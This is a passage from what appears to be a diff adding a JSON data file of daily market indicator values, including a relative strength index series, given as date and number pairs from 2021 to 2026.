], + [ + "2025-08-19", + 13.325404922412487 + ], + [ + "2025-08-20", + 13.548915739425748 + ], + [ + "2025-08-21", + 13.686194651883055 + ], + [ + "2025-08-22", + 15.556835842187247 + ], + [ + "2025-08-25", + 15.564198132164151 + ], + [ + "2025-08-26", + 15.64830266955016 + ], + [ + "2025-08-27", + 15.653867723742199 + ], + [ + "2025-08-28", + 15.581499599177917 + ], + [ + "2025-08-29", + 13.227040071393976 + ], + [ + "2025-09-02", + 11.130352098181739 + ], + [ + "2025-09-03", + 11.139065300521219 + ], + [ + "2025-09-04", + 10.45261777739515 + ], + [ + "2025-09-05", + 10.373946607518123 + ], + [ + "2025-09-08", + 9.81093487912408 + ], + [ + "2025-09-09", + 9.752134981754502 + ], + [ + "2025-09-10", + 8.191127390276387 + ], + [ + "2025-09-11", + 8.527529076981688 + ], + [ + "2025-09-12", + 8.670775618419288 + ], + [ + "2025-09-15", + 8.988926849394122 + ], + [ + "2025-09-16", + 9.007061755144594 + ], + [ + "2025-09-17", + 6.6012466301828665 + ], + [ + "2025-09-18", + 6.386605877771827 + ], + [ + "2025-09-19", + 5.911424642176683 + ], + [ + "2025-09-22", + 4.048820950156048 + ], + [ + "2025-09-23", + 4.794968094484223 + ], + [ + "2025-09-24", + 5.184661635511739 + ], + [ + "2025-09-25", + 5.687094906634536 + ], + [ + "2025-09-26", + 5.505147533547273 + ], + [ + "2025-09-29", + 2.9103604328255566 + ], + [ + "2025-09-30", + 0.9380851049521339 + ], + [ + "2025-10-01", + 0.579824773837592 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 0.8191807524204212 + ], + [ + "2025-10-06", + 1.167887646372694 + ], + [ + "2025-10-07", + 2.0941994941946382 + ], + [ + "2025-10-08", + 3.284720667255973 + ], + [ + "2025-10-09", + 3.325195145815623 + ], + [ + "2025-10-10", + 16.692261739381095 + ], + [ + "2025-10-13", + 19.438270503753387 + ], + [ + "2025-10-14", + 19.82399002722443 + ], + [ + "2025-10-15", + 20.02559475689415 + ], + [ + "2025-10-16", + 19.669849934659197 + ], + [ + "2025-10-17", + 19.64644908108194 + ], + [ + "2025-10-20", + 20.483252903391836 + ], + [ + "2025-10-21", + 20.08797019480617 + ], + [ + "2025-10-22", + 20.750757494378707 + ], + [ + "2025-10-23", + 20.91459352123714 + ], + [ + "2025-10-24", + 21.41575996165911 + ], + [ + "2025-10-27", + 23.02553062371933 + ], + [ + "2025-10-28", + 23.199436250670345 + ], + [ + "2025-10-29", + 23.18815668490071 + ], + [ + "2025-10-30", + 25.06705718543052 + ], + [ + "2025-10-31", + 24.87002298205234 + ], + [ + "2025-11-03", + 24.72526948678343 + ], + [ + "2025-11-04", + 27.336668708947663 + ], + [ + "2025-11-05", + 26.892394034812998 + ], + [ + "2025-11-06", + 28.986726296736283 + ], + [ + "2025-11-07", + 21.170369090864288 + ], + [ + "2025-11-10", + 21.357403853463254 + ], + [ + "2025-11-11", + 20.994877389663337 + ], + [ + "2025-11-12", + 20.848792641550823 + ], + [ + "2025-11-13", + 23.82170936390973 + ], + [ + "2025-11-14", + 23.60234681527689 + ], + [ + "2025-11-17", + 23.01096688322409 + ], + [ + "2025-11-18", + 23.797095639955966 + ], + [ + "2025-11-19", + 23.573127249737745 + ], + [ + "2025-11-20", + 26.136516592546975 + ], + [ + "2025-11-21", + 25.734890837537243 + ], + [ + "2025-11-24", + 27.848765471571944 + ], + [ + "2025-11-25", + 27.69184949945373 + ], + [ + "2025-11-26", + 28.120976069860294 + ], + [ + "2025-11-28", + 27.397316815492058 + ], + [ + "2025-12-01", + 27.245163607977535 + ], + [ + "2025-12-02", + 27.504319488446193 + ], + [ + "2025-12-03", + 25.12604365967894 + ], + [ + "2025-12-04", + 24.881008391257843 + ], + [ + "2025-12-05", + 22.60262391649257 + ], + [ + "2025-12-08", + 22.532436308319273 + ], + [ + "2025-12-09", + 19.399458583344657 + ], + [ + "2025-12-10", + 19.428172150102238 + ], + [ + "2025-12-11", + 19.510016675142317 + ], + [ + "2025-12-12", + 19.200270378119196 + ], + [ + "2025-12-15", + 19.400376730741055 + ], + [ + "2025-12-16", + 18.84198626187467 + ], + [ + "2025-12-17", + 20.350672791656695 + ], + [ + "2025-12-18", + 21.4766031081525 + ], + [ + "2025-12-19", + 17.746102580889065 + ], + [ + "2025-12-22", + 17.591970803340086 + ], + [ + "2025-12-23", + 13.091260890131387 + ], + [ + "2025-12-24", + 12.898525997425873 + ], + [ + "2025-12-26", + 12.356604818070858 + ], + [ + "2025-12-29", + 12.18127972293152 + ], + [ + "2025-12-30", + 12.149047366008576 + ], + [ + "2025-12-31", + 12.18976338078415 + ], + [ + "2026-01-02", + 12.119989359875985 + ], + [ + "2026-01-05", + 12.810834166263643 + ], + [ + "2026-01-06", + 13.402373253239313 + ], + [ + "2026-01-07", + 13.379161623517724 + ], + [ + "2026-01-08", + 13.647898562181565 + ], + [ + "2026-01-09", + 14.363917695347556 + ], + [ + "2026-01-12", + 14.283237462435372 + ], + [ + "2026-01-13", + 10.587339222492341 + ], + [ + "2026-01-14", + 11.534577347110291 + ], + [ + "2026-01-15", + 11.588396612995815 + ], + [ + "2026-01-16", + 7.52527835940546 + ], + [ + "2026-01-20", + 10.63839577820318 + ], + [ + "2026-01-21", + 10.673876794076808 + ], + [ + "2026-01-22", + 11.014990107998395 + ], + [ + "2026-01-23", + 10.885544124158434 + ], + [ + "2026-01-26", + 10.999379238644828 + ], + [ + "2026-01-27", + 11.714786910908732 + ], + [ + "2026-01-28", + 11.46809558496972 + ], + [ + "2026-01-29", + 11.8073688577265 + ], + [ + "2026-01-30", + 12.551530666538019 + ], + [ + "2026-02-02", + 12.80251968810871 + ], + [ + "2026-02-03", + 14.553729650083428 + ], + [ + "2026-02-04", + 16.087266592417908 + ], + [ + "2026-02-05", + 17.223170345942208 + ], + [ + "2026-02-06", + 20.743361901831094 + ], + [ + "2026-02-09", + 20.462259286381773 + ], + [ + "2026-02-10", + 20.51779838994017 + ], + [ + "2026-02-11", + 20.612988234254495 + ], + [ + "2026-02-12", + 22.49084658176632 + ], + [ + "2026-02-13", + 22.38446205207535 + ], + [ + "2026-02-17", + 22.389175667862755 + ], + [ + "2026-02-18", + 20.087251241358832 + ], + [ + "2026-02-19", + 18.764277386138424 + ], + [ + "2026-02-20", + 18.897522099085077 + ], + [ + "2026-02-23", + 19.588280246972396 + ], + [ + "2026-02-24", + 20.416609554757173 + ], + [ + "2026-02-25", + 21.33495663145191 + ], + [ + "2026-02-26", + 21.87765212693746 + ], + [ + "2026-02-27", + 21.784969356558943 + ], + [ + "2026-03-02", + 21.06657079012898 + ], + [ + "2026-03-03", + 21.14802112875298 + ], + [ + "2026-03-04", + 21.56256231974451 + ], + [ + "2026-03-05", + 19.508016794518518 + ], + [ + "2026-03-06", + 19.706428361231133 + ], + [ + "2026-03-09", + 17.784679212601077 + ], + [ + "2026-03-10", + 17.290371686314277 + ], + [ + "2026-03-11", + 17.15805450710252 + ], + [ + "2026-03-12", + 19.04312881344106 + ], + [ + "2026-03-13", + 16.39605927245222 + ], + [ + "2026-03-16", + 17.42022663267522 + ], + [ + "2026-03-17", + 17.607294193119778 + ], + [ + "2026-03-18", + 18.611589387032694 + ], + [ + "2026-03-19", + 18.582354100094317 + ], + [ + "2026-03-20", + 20.05890485504405 + ], + [ + "2026-03-23", + 20.539111438781223 + ], + [ + "2026-03-24", + 19.692733314230264 + ], + [ + "2026-03-25", + 18.309143094540037 + ], + [ + "2026-03-26", + 20.92045770632503 + ], + [ + "2026-03-27", + 22.73925104305132 + ], + [ + "2026-03-30", + 22.64324027876648 + ], + [ + "2026-03-31", + 30.252558743418568 + ], + [ + "2026-04-01", + 29.80791115078743 + ], + [ + "2026-04-02", + 29.847843753101756 + ], + [ + "2026-04-06", + 29.117310888076947 + ], + [ + "2026-04-07", + 27.98576033984217 + ], + [ + "2026-04-08", + 32.831361204352525 + ], + [ + "2026-04-09", + 33.05450377477479 + ], + [ + "2026-04-10", + 31.42670983443213 + ], + [ + "2026-04-13", + 31.476393163603532 + ], + [ + "2026-04-14", + 32.38750008219483 + ], + [ + "2026-04-15", + 33.03070227519918 + ], + [ + "2026-04-16", + 31.447217128375943 + ], + [ + "2026-04-17", + 31.576722062244777 + ], + [ + "2026-04-20", + 28.78267641102832 + ], + [ + "2026-04-21", + 28.976765226804257 + ], + [ + "2026-04-22", + 28.838541306484107 + ], + [ + "2026-04-23", + 29.495720614766753 + ] + ], + "rsi": [ + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 0.0 + ], + [ + "2021-04-28", + 0.0 + ], + [ + "2021-04-29", + 6.053241994597599 + ], + [ + "2021-04-30", + 5.4087565973273115 + ], + [ + "2021-05-03", + 4.950541158341508 + ], + [ + "2021-05-04", + 3.7887929998502017 + ], + [ + "2021-05-05", + 3.6209011870022323 + ], + [ + "2021-05-06", + 12.907082684096423 + ], + [ + "2021-05-07", + 21.71717926623218 + ], + [ + "2021-05-10", + 16.18501571805217 + ], + [ + "2021-05-11", + 15.95168649637776 + ], + [ + "2021-05-12", + 12.360946977379001 + ], + [ + "2021-05-13", + 18.13544718698718 + ], + [ + "2021-05-14", + 32.0164354552505 + ], + [ + "2021-05-17", + 30.45459097802666 + ], + [ + "2021-05-18", + 28.782164795472866 + ], + [ + "2021-05-19", + 29.48673779374043 + ], + [ + "2021-05-20", + 40.226618753390156 + ], + [ + "2021-05-21", + 38.39001063970511 + ], + [ + "2021-05-24", + 46.36012154994044 + ], + [ + "2021-05-25", + 46.9779486650779 + ], + [ + "2021-05-26", + 48.586205662512825 + ], + [ + "2021-05-27", + 46.934233731743525 + ], + [ + "2021-05-28", + 48.517702450153145 + ], + [ + "2021-06-01", + 46.92368198371636 + ], + [ + "2021-06-02", + 48.00090365188411 + ], + [ + "2021-06-03", + 42.98465582408332 + ], + [ + "2021-06-04", + 51.74846517937088 + ], + [ + "2021-06-07", + 53.13389638520339 + ], + [ + "2021-06-08", + 53.364523578389104 + ], + [ + "2021-06-09", + 53.487769772499895 + ], + [ + "2021-06-10", + 58.652707210760596 + ], + [ + "2021-06-11", + 59.869595427327916 + ], + [ + "2021-06-14", + 64.05529824617915 + ], + [ + "2021-06-15", + 59.459745676874945 + ], + [ + "2021-06-16", + 57.01256165732055 + ], + [ + "2021-06-17", + 62.73406516636877 + ], + [ + "2021-06-18", + 57.569530747807846 + ], + [ + "2021-06-21", + 60.333021212096405 + ], + [ + "2021-06-22", + 64.12975266109615 + ], + [ + "2021-06-23", + 64.32454175047744 + ], + [ + "2021-06-24", + 66.78111159130988 + ], + [ + "2021-06-25", + 65.80499237034459 + ], + [ + "2021-06-28", + 70.40815310942739 + ], + [ + "2021-06-29", + 71.64606943484887 + ], + [ + "2021-06-30", + 70.26113537676424 + ], + [ + "2021-07-01", + 70.41509514028573 + ], + [ + "2021-07-02", + 74.54153059507885 + ], + [ + "2021-07-06", + 75.91902222032786 + ], + [ + "2021-07-07", + 76.58795298630852 + ], + [ + "2021-07-08", + 70.53538464993895 + ], + [ + "2021-07-09", + 72.90476589377329 + ], + [ + "2021-07-12", + 74.30544077272413 + ], + [ + "2021-07-13", + 74.30544077272413 + ], + [ + "2021-07-14", + 74.99657095116576 + ], + [ + "2021-07-15", + 67.34433319294274 + ], + [ + "2021-07-16", + 59.8178380475188 + ], + [ + "2021-07-19", + 53.372208136943726 + ], + [ + "2021-07-20", + 59.91337984041776 + ], + [ + "2021-07-21", + 63.60965994961468 + ], + [ + "2021-07-22", + 66.48150975813024 + ], + [ + "2021-07-23", + 70.88202739513315 + ], + [ + "2021-07-26", + 71.1602466111938 + ], + [ + "2021-07-27", + 62.1996535503689 + ], + [ + "2021-07-28", + 63.88816234443389 + ], + [ + "2021-07-29", + 64.67725754963463 + ], + [ + "2021-07-30", + 60.494636383537966 + ], + [ + "2021-08-02", + 60.53766404847875 + ], + [ + "2021-08-03", + 63.68559831923962 + ], + [ + "2021-08-04", + 64.41869318167916 + ], + [ + "2021-08-05", + 67.52272420286646 + ], + [ + "2021-08-06", + 63.382647954819255 + ], + [ + "2021-08-09", + 64.370126060545 + ], + [ + "2021-08-10", + 59.56204796840634 + ], + [ + "2021-08-11", + 58.006796596776596 + ], + [ + "2021-08-12", + 60.3434484079407 + ], + [ + "2021-08-13", + 62.537239587862246 + ], + [ + "2021-08-16", + 62.81209693348161 + ], + [ + "2021-08-17", + 54.126968906261546 + ], + [ + "2021-08-18", + 46.61014704778601 + ], + [ + "2021-08-19", + 50.30521141317022 + ], + [ + "2021-08-20", + 57.18044139765383 + ], + [ + "2021-08-23", + 64.82605274853432 + ], + [ + "2021-08-24", + 66.17424964598436 + ], + [ + "2021-08-25", + 66.69272654834202 + ], + [ + "2021-08-26", + 61.10877006602368 + ], + [ + "2021-08-27", + 65.79929573497927 + ], + [ + "2021-08-30", + 70.29679154439991 + ], + [ + "2021-08-31", + 69.57301720285484 + ], + [ + "2021-09-01", + 70.24346139856988 + ], + [ + "2021-09-02", + 69.77056861051986 + ], + [ + "2021-09-03", + 71.1316228992807 + ], + [ + "2021-09-07", + 71.76352872569379 + ], + [ + "2021-09-08", + 67.82563695019132 + ], + [ + "2021-09-09", + 64.09514671476106 + ], + [ + "2021-09-10", + 56.70997757292274 + ], + [ + "2021-09-13", + 56.08186005998334 + ], + [ + "2021-09-14", + 53.45734737006409 + ], + [ + "2021-09-15", + 58.86322374077815 + ], + [ + "2021-09-16", + 59.337192189358525 + ], + [ + "2021-09-17", + 48.885042806469045 + ], + [ + "2021-09-20", + 36.83659997760265 + ], + [ + "2021-09-21", + 37.79937977734743 + ], + [ + "2021-09-22", + 44.69907059785561 + ], + [ + "2021-09-23", + 50.58469124791837 + ], + [ + "2021-09-24", + 51.15932750311593 + ], + [ + "2021-09-27", + 46.23043298885946 + ], + [ + "2021-09-28", + 33.87129718820894 + ], + [ + "2021-09-29", + 33.33106128716018 + ], + [ + "2021-09-30", + 32.09755644313141 + ], + [ + "2021-10-01", + 36.36296501461999 + ], + [ + "2021-10-04", + 29.554562347213945 + ], + [ + "2021-10-05", + 37.49055262430823 + ], + [ + "2021-10-06", + 40.937896484232034 + ], + [ + "2021-10-07", + 45.59410544719262 + ], + [ + "2021-10-08", + 43.56539772917559 + ], + [ + "2021-10-11", + 40.58886067345184 + ], + [ + "2021-10-12", + 39.28456531151881 + ], + [ + "2021-10-13", + 43.73936755506309 + ], + [ + "2021-10-14", + 52.449491345943855 + ], + [ + "2021-10-15", + 55.06011311919401 + ], + [ + "2021-10-18", + 58.95738622811472 + ], + [ + "2021-10-19", + 61.67783403075686 + ], + [ + "2021-10-20", + 60.92219453112632 + ], + [ + "2021-10-21", + 63.191831427009575 + ], + [ + "2021-10-22", + 58.156540664985584 + ], + [ + "2021-10-25", + 62.087213899948715 + ], + [ + "2021-10-26", + 63.24260666255603 + ], + [ + "2021-10-27", + 64.1135639909341 + ], + [ + "2021-10-28", + 68.02610243244192 + ], + [ + "2021-10-29", + 69.62345954469504 + ], + [ + "2021-11-01", + 70.72350116369338 + ], + [ + "2021-11-02", + 72.06079338228636 + ], + [ + "2021-11-03", + 75.17412741517289 + ], + [ + "2021-11-04", + 78.34532738352993 + ], + [ + "2021-11-05", + 78.56765896770548 + ], + [ + "2021-11-08", + 77.35241771579773 + ], + [ + "2021-11-09", + 71.32440677648933 + ], + [ + "2021-11-10", + 60.549108544535926 + ], + [ + "2021-11-11", + 61.707162804006806 + ], + [ + "2021-11-12", + 65.8192500316267 + ], + [ + "2021-11-15", + 65.65307056314981 + ], + [ + "2021-11-16", + 68.34191458647268 + ], + [ + "2021-11-17", + 68.5401314351827 + ], + [ + "2021-11-18", + 72.21564402823302 + ], + [ + "2021-11-19", + 73.9945838224932 + ], + [ + "2021-11-22", + 64.65989945931388 + ], + [ + "2021-11-23", + 61.4216505489068 + ], + [ + "2021-11-24", + 62.83148811752675 + ], + [ + "2021-11-26", + 50.98111038816079 + ], + [ + "2021-11-29", + 60.08558520962371 + ], + [ + "2021-11-30", + 52.785552138895305 + ], + [ + "2021-12-01", + 45.92690403977593 + ], + [ + "2021-12-02", + 48.90416629733802 + ], + [ + "2021-12-03", + 42.74480177392624 + ], + [ + "2021-12-06", + 46.057790142869514 + ], + [ + "2021-12-07", + 56.35957470182385 + ], + [ + "2021-12-08", + 57.691334718844374 + ], + [ + "2021-12-09", + 52.041470429625086 + ], + [ + "2021-12-10", + 55.46068801156967 + ], + [ + "2021-12-13", + 50.2749046980146 + ], + [ + "2021-12-14", + 46.93755833565567 + ], + [ + "2021-12-15", + 54.091404170415785 + ], + [ + "2021-12-16", + 46.33088529817938 + ], + [ + "2021-12-17", + 45.01606284635042 + ], + [ + "2021-12-20", + 42.503221394526086 + ], + [ + "2021-12-21", + 49.44686719012702 + ], + [ + "2021-12-22", + 52.857772696105926 + ], + [ + "2021-12-23", + 54.910653266459136 + ], + [ + "2021-12-27", + 59.14277401644531 + ], + [ + "2021-12-28", + 57.48628392399828 + ], + [ + "2021-12-29", + 57.43075527937807 + ], + [ + "2021-12-30", + 56.25924214665792 + ], + [ + "2021-12-31", + 53.79711973986138 + ], + [ + "2022-01-03", + 56.90850953441003 + ], + [ + "2022-01-04", + 51.79850616002657 + ], + [ + "2022-01-05", + 42.24767621852895 + ], + [ + "2022-01-06", + 42.06248942707332 + ], + [ + "2022-01-07", + 39.21122890479435 + ], + [ + "2022-01-10", + 39.476718556522414 + ], + [ + "2022-01-11", + 45.348412161744285 + ], + [ + "2022-01-12", + 46.83667560392051 + ], + [ + "2022-01-13", + 39.4999695499518 + ], + [ + "2022-01-14", + 41.877890514667435 + ], + [ + "2022-01-18", + 35.781173165565505 + ], + [ + "2022-01-19", + 33.52017329512668 + ], + [ + "2022-01-20", + 31.049022201913502 + ], + [ + "2022-01-21", + 26.59928422322534 + ], + [ + "2022-01-24", + 28.37378315942749 + ], + [ + "2022-01-25", + 25.05547816140519 + ], + [ + "2022-01-26", + 24.849158045357626 + ], + [ + "2022-01-27", + 23.509265127518134 + ], + [ + "2022-01-28", + 35.12541548030822 + ], + [ + "2022-01-31", + 44.643970986139635 + ], + [ + "2022-02-01", + 46.50001361160411 + ], + [ + "2022-02-02", + 48.72613206338793 + ], + [ + "2022-02-03", + 39.762999376189086 + ], + [ + "2022-02-04", + 43.12644952868308 + ], + [ + "2022-02-07", + 41.51444174732377 + ], + [ + "2022-02-08", + 44.603795502844804 + ], + [ + "2022-02-09", + 50.02564945004432 + ], + [ + "2022-02-10", + 44.867620596491435 + ], + [ + "2022-02-11", + 38.94390726482682 + ], + [ + "2022-02-14", + 39.27045864730118 + ], + [ + "2022-02-15", + 45.56981649416513 + ], + [ + "2022-02-16", + 45.51687211379552 + ], + [ + "2022-02-17", + 39.673708526687086 + ], + [ + "2022-02-18", + 37.732932005323036 + ], + [ + "2022-02-22", + 36.07827190625159 + ], + [ + "2022-02-23", + 32.23485387009782 + ], + [ + "2022-02-24", + 40.90166806704319 + ], + [ + "2022-02-25", + 44.54479360183582 + ], + [ + "2022-02-28", + 45.25372798438697 + ], + [ + "2022-03-01", + 42.254526078336745 + ], + [ + "2022-03-02", + 46.38402791271668 + ], + [ + "2022-03-03", + 43.48514455303341 + ], + [ + "2022-03-04", + 40.74292683179427 + ], + [ + "2022-03-07", + 34.81333767157261 + ], + [ + "2022-03-08", + 34.16342158988391 + ], + [ + "2022-03-09", + 42.997889824587695 + ], + [ + "2022-03-10", + 41.099741374617444 + ], + [ + "2022-03-11", + 37.78254956267273 + ], + [ + "2022-03-14", + 35.02205944659926 + ], + [ + "2022-03-15", + 42.295401050947696 + ], + [ + "2022-03-16", + 49.69079709651649 + ], + [ + "2022-03-17", + 51.936525358044136 + ], + [ + "2022-03-18", + 55.58971438219882 + ], + [ + "2022-03-21", + 54.966048562608876 + ], + [ + "2022-03-22", + 58.50039772924547 + ], + [ + "2022-03-23", + 55.032258619673755 + ], + [ + "2022-03-24", + 59.02049753649128 + ], + [ + "2022-03-25", + 58.80499048983667 + ], + [ + "2022-03-28", + 61.60284317821081 + ], + [ + "2022-03-29", + 64.53288234579375 + ], + [ + "2022-03-30", + 61.246842321425525 + ], + [ + "2022-03-31", + 57.73348730306546 + ], + [ + "2022-04-01", + 57.19764711603437 + ], + [ + "2022-04-04", + 61.3669865110928 + ], + [ + "2022-04-05", + 55.014814416923635 + ], + [ + "2022-04-06", + 49.71611832880773 + ], + [ + "2022-04-07", + 50.268787396586355 + ], + [ + "2022-04-08", + 46.991103864922025 + ], + [ + "2022-04-11", + 42.06249890454026 + ], + [ + "2022-04-12", + 41.25028281402249 + ], + [ + "2022-04-13", + 46.5741190959346 + ], + [ + "2022-04-14", + 41.88252132324954 + ], + [ + "2022-04-18", + 42.088823658792414 + ], + [ + "2022-04-19", + 47.88723421822782 + ], + [ + "2022-04-20", + 44.67374488055069 + ], + [ + "2022-04-21", + 40.574407386943335 + ], + [ + "2022-04-22", + 36.14728325789442 + ], + [ + "2022-04-25", + 39.541069852623956 + ], + [ + "2022-04-26", + 33.785758142229284 + ], + [ + "2022-04-27", + 33.62477839833352 + ], + [ + "2022-04-28", + 42.379135081413 + ], + [ + "2022-04-29", + 35.72219191807221 + ], + [ + "2022-05-02", + 39.35714817088112 + ], + [ + "2022-05-03", + 39.59633046162365 + ], + [ + "2022-05-04", + 46.76460508557103 + ], + [ + "2022-05-05", + 39.07470779395759 + ], + [ + "2022-05-06", + 37.57165123903357 + ], + [ + "2022-05-09", + 33.14179230283848 + ], + [ + "2022-05-10", + 35.58211883844564 + ], + [ + "2022-05-11", + 32.432157651498926 + ], + [ + "2022-05-12", + 32.19470478227173 + ], + [ + "2022-05-13", + 39.636570732845854 + ], + [ + "2022-05-16", + 38.17303453576314 + ], + [ + "2022-05-17", + 43.16451677749201 + ], + [ + "2022-05-18", + 36.92276437473348 + ], + [ + "2022-05-19", + 36.33544177506997 + ], + [ + "2022-05-20", + 35.97985965397173 + ], + [ + "2022-05-23", + 39.38668995255264 + ], + [ + "2022-05-24", + 36.655811579217826 + ], + [ + "2022-05-25", + 39.56307408731412 + ], + [ + "2022-05-26", + 45.0184423636247 + ], + [ + "2022-05-27", + 50.80776619882846 + ], + [ + "2022-05-31", + 50.32875840445218 + ], + [ + "2022-06-01", + 48.94700973538847 + ], + [ + "2022-06-02", + 53.95112492285123 + ], + [ + "2022-06-03", + 48.91135982181603 + ], + [ + "2022-06-06", + 49.544274522003725 + ], + [ + "2022-06-07", + 51.23460915580101 + ], + [ + "2022-06-08", + 49.7249513185704 + ], + [ + "2022-06-09", + 44.50649195010083 + ], + [ + "2022-06-10", + 38.87567953461922 + ], + [ + "2022-06-13", + 33.134279195689146 + ], + [ + "2022-06-14", + 33.52789039549542 + ], + [ + "2022-06-15", + 38.86811060252101 + ], + [ + "2022-06-16", + 33.99717309345864 + ], + [ + "2022-06-17", + 36.476662374285716 + ], + [ + "2022-06-21", + 41.451102087522266 + ], + [ + "2022-06-22", + 41.24493320385614 + ], + [ + "2022-06-23", + 44.28741023679735 + ], + [ + "2022-06-24", + 50.70589205792875 + ], + [ + "2022-06-27", + 49.35081067897983 + ], + [ + "2022-06-28", + 44.11376992633228 + ], + [ + "2022-06-29", + 44.29949196560259 + ], + [ + "2022-06-30", + 42.2520215260346 + ], + [ + "2022-07-01", + 43.72417791879285 + ], + [ + "2022-07-05", + 47.48820342433022 + ], + [ + "2022-07-06", + 48.890572019662244 + ], + [ + "2022-07-07", + 53.39286569615719 + ], + [ + "2022-07-08", + 53.65609309227433 + ], + [ + "2022-07-11", + 48.61363738630479 + ], + [ + "2022-07-12", + 46.524273300412304 + ], + [ + "2022-07-13", + 46.074875071528034 + ], + [ + "2022-07-14", + 47.027483604705736 + ], + [ + "2022-07-15", + 51.71076330537885 + ], + [ + "2022-07-18", + 49.47330395876818 + ], + [ + "2022-07-19", + 56.737092797448874 + ], + [ + "2022-07-20", + 60.026115574583955 + ], + [ + "2022-07-21", + 62.82528705853711 + ], + [ + "2022-07-22", + 57.45656296230031 + ], + [ + "2022-07-25", + 55.81739727673944 + ], + [ + "2022-07-26", + 50.49573414617241 + ], + [ + "2022-07-27", + 59.305532260695585 + ], + [ + "2022-07-28", + 61.10322441235644 + ], + [ + "2022-07-29", + 64.30172896093255 + ], + [ + "2022-08-01", + 64.11079056857773 + ], + [ + "2022-08-02", + 63.11245908365986 + ], + [ + "2022-08-03", + 67.99964673349982 + ], + [ + "2022-08-04", + 68.78523795103436 + ], + [ + "2022-08-05", + 65.73514446934084 + ], + [ + "2022-08-08", + 64.52589253722688 + ], + [ + "2022-08-09", + 60.35247946380587 + ], + [ + "2022-08-10", + 66.10783882032962 + ], + [ + "2022-08-11", + 64.0159360460182 + ], + [ + "2022-08-12", + 67.76312882294744 + ], + [ + "2022-08-15", + 69.22353134534166 + ], + [ + "2022-08-16", + 68.25070373820702 + ], + [ + "2022-08-17", + 63.57593502295161 + ], + [ + "2022-08-18", + 64.12747550734989 + ], + [ + "2022-08-19", + 56.62334960751727 + ], + [ + "2022-08-22", + 48.52675707460838 + ], + [ + "2022-08-23", + 48.29934523391992 + ], + [ + "2022-08-24", + 49.19708831401681 + ], + [ + "2022-08-25", + 54.414638520088836 + ], + [ + "2022-08-26", + 43.15466368642713 + ], + [ + "2022-08-29", + 41.04540745158519 + ], + [ + "2022-08-30", + 38.762741549359696 + ], + [ + "2022-08-31", + 37.60021893539552 + ], + [ + "2022-09-01", + 37.74961999032492 + ], + [ + "2022-09-02", + 34.82855338678354 + ], + [ + "2022-09-06", + 33.432148561009 + ], + [ + "2022-09-07", + 40.594340211892025 + ], + [ + "2022-09-08", + 42.343508644516575 + ], + [ + "2022-09-09", + 49.17469224405469 + ], + [ + "2022-09-12", + 52.538906340620066 + ], + [ + "2022-09-13", + 39.42015340670632 + ], + [ + "2022-09-14", + 41.56862948143105 + ], + [ + "2022-09-15", + 38.46054935457217 + ], + [ + "2022-09-16", + 37.373966099543885 + ], + [ + "2022-09-19", + 39.69634369362272 + ], + [ + "2022-09-20", + 38.1257174760243 + ], + [ + "2022-09-21", + 34.81954425952323 + ], + [ + "2022-09-22", + 32.754663920042105 + ], + [ + "2022-09-23", + 30.23198365604884 + ], + [ + "2022-09-26", + 29.61782746861273 + ], + [ + "2022-09-27", + 29.766055835120042 + ], + [ + "2022-09-28", + 36.87415723393181 + ], + [ + "2022-09-29", + 31.75820645997969 + ], + [ + "2022-09-30", + 29.26073689901027 + ], + [ + "2022-10-03", + 36.567309495082554 + ], + [ + "2022-10-04", + 44.96402979922931 + ], + [ + "2022-10-05", + 44.852496985137144 + ], + [ + "2022-10-06", + 43.14686436456703 + ], + [ + "2022-10-07", + 36.05634537954538 + ], + [ + "2022-10-10", + 34.514952835507984 + ], + [ + "2022-10-11", + 32.48038117556793 + ], + [ + "2022-10-12", + 32.42979876824094 + ], + [ + "2022-10-13", + 39.39243740399823 + ], + [ + "2022-10-14", + 34.38711051425547 + ], + [ + "2022-10-17", + 42.73689684732818 + ], + [ + "2022-10-18", + 44.614634692597264 + ], + [ + "2022-10-19", + 43.89413999599453 + ], + [ + "2022-10-20", + 42.85527954471981 + ], + [ + "2022-10-21", + 48.82005522761818 + ], + [ + "2022-10-24", + 51.44116636000126 + ], + [ + "2022-10-25", + 56.049214535233276 + ], + [ + "2022-10-26", + 50.43020081620558 + ], + [ + "2022-10-27", + 46.39436789651055 + ], + [ + "2022-10-28", + 53.06895233005105 + ], + [ + "2022-10-31", + 50.4212320436591 + ], + [ + "2022-11-01", + 48.17317364256244 + ], + [ + "2022-11-02", + 41.549270560519766 + ], + [ + "2022-11-03", + 38.41817902186614 + ], + [ + "2022-11-04", + 42.20476678204458 + ], + [ + "2022-11-07", + 44.74593514156583 + ], + [ + "2022-11-08", + 46.44524440228322 + ], + [ + "2022-11-09", + 42.00744591036004 + ], + [ + "2022-11-10", + 56.11383480568623 + ], + [ + "2022-11-11", + 58.9941189938732 + ], + [ + "2022-11-14", + 57.04401839510866 + ], + [ + "2022-11-15", + 59.31430412855369 + ], + [ + "2022-11-16", + 56.12011861331315 + ], + [ + "2022-11-17", + 55.605734507827854 + ], + [ + "2022-11-18", + 55.6127383148407 + ], + [ + "2022-11-21", + 52.99345525637054 + ], + [ + "2022-11-22", + 56.08026239681129 + ], + [ + "2022-11-23", + 58.17130936139245 + ], + [ + "2022-11-25", + 56.26161003547969 + ], + [ + "2022-11-28", + 52.17430268568928 + ], + [ + "2022-11-29", + 50.1786872079082 + ], + [ + "2022-11-30", + 60.02061879781485 + ], + [ + "2022-12-01", + 60.258646184195975 + ], + [ + "2022-12-02", + 59.02885692702271 + ], + [ + "2022-12-05", + 54.04426774028718 + ], + [ + "2022-12-06", + 48.67153735329074 + ], + [ + "2022-12-07", + 47.686499117317815 + ], + [ + "2022-12-08", + 50.78342204535473 + ], + [ + "2022-12-09", + 49.07756120324435 + ], + [ + "2022-12-12", + 52.44221229055852 + ], + [ + "2022-12-13", + 55.20642245255972 + ], + [ + "2022-12-14", + 52.89834737684276 + ], + [ + "2022-12-15", + 43.99410689167535 + ], + [ + "2022-12-16", + 41.90925310956101 + ], + [ + "2022-12-19", + 39.00318987515801 + ], + [ + "2022-12-20", + 38.84478328988422 + ], + [ + "2022-12-21", + 43.450501080143326 + ], + [ + "2022-12-22", + 38.15559907651239 + ], + [ + "2022-12-23", + 38.875028160244824 + ], + [ + "2022-12-27", + 36.03119345284003 + ], + [ + "2022-12-28", + 33.594716422487025 + ], + [ + "2022-12-29", + 41.37300790602299 + ], + [ + "2022-12-30", + 41.24173116362222 + ], + [ + "2023-01-03", + 39.71484153345795 + ], + [ + "2023-01-04", + 41.351632893473756 + ], + [ + "2023-01-05", + 37.71102915738102 + 